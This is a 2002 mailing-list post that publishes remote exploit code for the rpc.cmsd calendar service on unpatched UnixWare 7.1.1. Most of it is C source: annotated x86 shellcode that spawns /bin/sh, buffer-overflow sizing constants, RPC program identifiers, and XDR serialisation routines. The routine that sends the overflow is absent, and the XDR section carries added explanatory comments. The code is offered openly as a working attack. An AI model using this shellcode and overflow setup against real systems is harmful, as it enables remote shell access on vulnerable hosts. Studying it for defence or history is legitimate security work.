Unixware 7.1.1 rpc.cmsd remote exploit code.

From: jGgM. (jggmat_private)
Date: Wed Jan 09 2002 - 20:40:54 PST


    
    Hi, I'm jGgM.
    
    Here is the UnixWare 7.1.1 rpc.cmsd remote exploit code.
    This is an old bug (currently patched, maybe).
    This works only on unpatched UnixWare 7.1.1.
    
    --------------------------------------
    Korean security Info.. by jGgM.
    http://www.forsecure.com/
    http://www.netemperor.com/
    --------------------------------------
    /*
     * Unixware 7.x rpc.cmsd exploit by jGgM
     * http://www.netemperor.com/en/
     * EMail: jggmat_private
     */
    
    #include <stdlib.h>
    #include <stdio.h>
    #include <string.h>
    #include <unistd.h>
    #include <rpc/rpc.h>
    
    #define CMSD_PROG 100068
    #define CMSD_VERS 4
    #define CMSD_PROC 21
    
    #define BUFFER_SIZE	1036
    #define SHELL_START	1024
    #define RET_LENGTH	12
    #define ADJUST		100
    #define NOP	0x90
    #define LEN		68
    
    char shell[] =
      /*  0 */ "\xeb\x3d"                         /* jmp springboard 
    [2000]*/
      /* syscall:                                                    [2000]*/
      /*  2 */ "\x9a\xff\xff\xff\xff\x07\xff"     /* lcall 0x7,0x0   
    [2000]*/
      /*  9 */ "\xc3"                             /* ret             [2000]*/
      /* start:                                                      [2000]*/
      /* 10 */ "\x5e"                             /* popl %esi       
    [2000]*/
      /* 11 */ "\x31\xc0"                         /* xor %eax,%eax   
    [2000]*/
      /* 13 */ "\x89\x46\xbf"                     /* movl %eax,-
    0x41(%esi) */
      /* 16 */ "\x88\x46\xc4"                     /* movb %al,-0x3c
    (%esi)  */
      /* 19 */ "\x89\x46\x0c"                     /* movl %eax,0xc
    (%esi)   */
      /* 22 */ "\x88\x46\x17"                     /* movb %al,0x17
    (%esi)   */
      /* 25 */ "\x88\x46\x1a"                     /* movb %al,0x1a
    (%esi)   */
      /* 28 */ "\x88\x46\xff"                     /* movb %al,0x??
    (%esi)   */
      /* execve:                                                     [2000]*/
      /* 31 */ "\x31\xc0"                         /* xor %eax,%eax   
    [2000]*/
      /* 33 */ "\x50"                             /* pushl %eax      
    [2000]*/
      /* 34 */ "\x56"                             /* pushl %esi      
    [2000]*/
      /* 35 */ "\x8d\x5e\x10"                     /* leal 0x10(%
    esi),%ebx  */
      /* 38 */ "\x89\x1e"                         /* movl %ebx,(%
    esi)[2000]*/
      /* 40 */ "\x53"                             /* pushl %ebx      
    [2000]*/
      /* 41 */ "\x8d\x5e\x18"                     /* leal 0x18(%
    esi),%ebx  */
      /* 44 */ "\x89\x5e\x04"                     /* movl %ebx,0x4
    (%esi)   */
      /* 47 */ "\x8d\x5e\x1b"                     /* leal 0x1b(%
    esi),%ebx  */
      /* 50 */ "\x89\x5e\x08"                     /* movl %ebx,0x8
    (%esi)   */
      /* 53 */ "\xb0\x3b"                         /* movb $0x3b,%al  
    [2000]*/
      /* 55 */ "\xe8\xc6\xff\xff\xff"             /* call syscall    
    [2000]*/
      /* 60 */ "\x83\xc4\x0c"                     /* addl $0xc,%
    esp  [2000]*/
      /* springboard:                                                [2000]*/
      /* 63 */ "\xe8\xc6\xff\xff\xff"             /* call start      
    [2000]*/
      /* data:                                                       [2000]*/
      /* 68 */ "\xff\xff\xff\xff"                 /* DATA            [2000]
    */
      /* 72 */ "\xff\xff\xff\xff"                 /* DATA            [2000]
    */
      /* 76 */ "\xff\xff\xff\xff"                 /* DATA            [2000]
    */
      /* 80 */ "\xff\xff\xff\xff"                 /* DATA            [2000]
    */
      /* 84 */ "\x2f\x62\x69\x6e\x2f\x73\x68\xff" /* 
    DATA            [2000]*/
      /* 92 */ "\x2d\x63\xff";                    /* DATA            
    [2000]*/
    
    /*
     * Argument record serialized by xdr_cm_send: two C strings, written or
     * read in the order s1, s2. Presumably the request body of the cmsd RPC
     * call; the call site is not part of this excerpt.
     */
    struct cm_send {
       char *s1;   /* first string member, handled by xdr_wrapstring */
       char *s2;   /* second string member, handled by xdr_wrapstring */
    };
    
    /*
     * Reply record serialized by xdr_cm_reply: a single int, handled by
     * xdr_int.
     */
    struct cm_reply {
       int i;   /* the only field of the reply */
    };
    
    /*
     * XDR filter for struct cm_send: encodes or decodes the two string
     * members, s1 then s2, with xdr_wrapstring (the direction is carried by
     * xdrs). Returns TRUE only if both members were processed, FALSE as soon
     * as one of them fails.
     *
     * xdr_wrapstring takes no caller-supplied length bound (it is xdr_string
     * with the maximum size), so a decoder that copies the result into a
     * fixed-size buffer has to check the length itself; xdr_string with an
     * explicit maxsize is the bounded form.
     */
    bool_t xdr_cm_send(XDR *xdrs, struct cm_send *objp)
    {
       bool_t ok = xdr_wrapstring(xdrs, &objp->s1);
       if (ok)
          ok = xdr_wrapstring(xdrs, &objp->s2);
       return ok ? TRUE : FALSE;
    }
    
    /*
     * XDR filter for struct cm_reply: encodes or decodes the single int
     * member with xdr_int. Returns TRUE on success, FALSE if xdr_int fails.
     */
    bool_t xdr_cm_reply(XDR *xdrs, struct cm_reply *objp)
    {
       return xdr_int(xdrs, &objp->i) ? TRUE : FALSE;
    }
    


